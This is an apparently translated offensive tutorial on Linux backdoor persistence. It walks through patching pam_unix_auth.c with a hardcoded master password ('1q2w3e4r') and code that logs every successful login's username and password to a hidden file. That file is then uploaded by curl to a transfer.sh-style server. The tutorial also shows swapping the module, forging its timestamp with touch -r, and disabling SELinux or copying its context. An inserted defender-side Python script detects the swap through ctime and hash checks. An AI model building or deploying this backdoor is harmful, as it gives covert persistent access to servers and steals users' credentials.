Linux Backdoor Persistence (Part 3): PAM Backdoor + transfer.sh

Check the installed PAM version and download the matching source

rpm -qa | grep pam
pam-1.1.8-12.el7_1.1.x86_64

http://www.linux-pam.org/library/
curl -O http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

Modify and build pam_unix_auth.c

cd Linux-PAM-1.1.8
vim modules/pam_unix/pam_unix_auth.c
pam_unix_auth.c before the change
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    name = p = NULL;
pam_unix_auth.c after the change
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    if(strcmp(p,"1q2w3e4r")==0){return PAM_SUCCESS;}
    if(retval == PAM_SUCCESS){
        FILE * fp;
        fp = fopen("/bin/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
        system("curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3");
        }
    name = p = NULL;
curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3
./configure
make

Built module: modules/pam_unix/.libs/pam_unix.so

Back up, replace, and adjust the timestamp

ll /lib64/security/
-rwxr-xr-x. 1 root root  57688 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.bak
cp ./pam_unix.so /lib64/security/pam_unix.so
touch -r /lib64/security/pam_userdb.so /lib64/security/pam_unix.so

ll /lib64/security/
-rwxr-xr-x. 1 root root 221776 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  57688 6月  30 23:18 pam_unix.so.bak
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so
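Added defender-side check, not part of the original post: touch -r copies atime/mtime onto the replaced module, but the kernel still records the replacement in the file's ctime, and the file's hash no longer matches what the package shipped. The script below flags both; its sample input is a constructed temporary directory and constructed ctime values, with module names taken from the listing above.

```python
import hashlib
import os
import statistics
import tempfile

def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def ctime_outliers(ctimes, tolerance=3600):
    """ctimes: {module name: st_ctime}. Modules from one package are installed
    together, so their ctimes cluster. touch -r copies atime/mtime onto the
    replaced file but the kernel still stamps ctime, so the swap stands out."""
    if not ctimes:
        return []
    baseline = statistics.median(ctimes.values())
    return sorted(n for n, c in ctimes.items() if abs(c - baseline) > tolerance)

def modified_modules(directory, baseline_hashes):
    """Compare each module to a known-good SHA-256 captured at install time
    (rpm -V pam performs the same kind of check against the package database)."""
    bad = []
    for name, expected in sorted(baseline_hashes.items()):
        path = os.path.join(directory, name)
        if not os.path.isfile(path) or sha256_of(path) != expected:
            bad.append(name)
    return bad

def demo():
    """Constructed sample: three fake modules are 'installed', then pam_unix.so
    is swapped and backdated the way touch -r does (mtime only)."""
    d = tempfile.mkdtemp()
    baseline = {}
    for name in ("pam_unix.so", "pam_userdb.so", "pam_warn.so"):
        p = os.path.join(d, name)
        with open(p, "wb") as f:
            f.write(b"original " + name.encode())
        baseline[name] = sha256_of(p)
    swapped = os.path.join(d, "pam_unix.so")
    with open(swapped, "wb") as f:
        f.write(b"rebuilt module with extra logic")
    ref = os.lstat(os.path.join(d, "pam_userdb.so"))
    os.utime(swapped, (ref.st_atime, ref.st_mtime))  # forged mtime; ctime untouched
    # constructed ctimes: a 2015 package install plus one fresh replacement
    ctimes = {"pam_unix.so": 1467300000.0, "pam_userdb.so": 1439900000.0,
              "pam_warn.so": 1439900000.0}
    return ctime_outliers(ctimes), modified_modules(d, baseline)
```

On a live host, feed ctime_outliers a map built from os.lstat(path).st_ctime over /lib64/security and give modified_modules the hashes recorded at install time; a ctime that differs from its siblings while the mtime matches them is the signature of the touch -r step.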

If SELinux is enabled, the replaced pam_unix.so will only work after SELinux is disabled or the correct context is set on the file.

Check SELinux status
getenforce
    Enforcing  (needs to be turned off, or the context fixed)
    Permissive (can stay on)
Temporarily disable SELinux
setenforce 0
Temporarily re-enable SELinux
setenforce 1

View the SELinux context:
ls -Z pam_unix.so.bak
Set the SELinux context:
chcon --reference=pam_unix.so.bak pam_unix.so
